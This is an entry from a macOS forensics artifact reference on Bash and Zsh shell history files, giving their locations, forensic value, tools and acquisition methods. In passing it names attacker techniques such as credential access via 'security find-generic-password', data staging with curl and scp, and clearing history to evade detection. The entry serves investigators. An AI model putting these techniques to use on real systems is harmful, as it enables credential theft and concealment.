Bash / Zsh Shell History

macosExecution EvidenceDisk Image

Location

~/.zsh_history (default since macOS Catalina), ~/.bash_history, ~/.zsh_sessions/

Description

Per-user shell command history files recording commands entered in interactive terminal sessions. Since macOS Catalina, Zsh is the default shell and history is stored in ~/.zsh_history. The ~/.zsh_sessions/ directory contains per-session history files with additional metadata. Extended history format includes timestamps for each command.

Forensic Value

Shell history provides direct evidence of commands executed by the attacker or compromised user including reconnaissance (whoami, sw_vers, ifconfig), persistence installation (launchctl load), credential access (security find-generic-password), and data staging (tar, zip, curl, scp). The Zsh sessions directory preserves per-session command history even when the main history file is cleared. Sophisticated attackers unset HISTFILE or clear history, but partially written session files and Unified Log entries may preserve command evidence. Always check all user accounts including root.

Tools Required

catgrepmac_aptstringsCrowdstrike UAC

Acquisition Methods

External Boot dd Image (Intel Mac)

macos — physical

Target Disk Mode (Intel Mac)

macos — physical

Share Disk (Apple Silicon)

macos — physical

SUMURI Recon ITR Logical Acquisition

macos — logical

Cellebrite Digital Collector (macOS)

macos — logical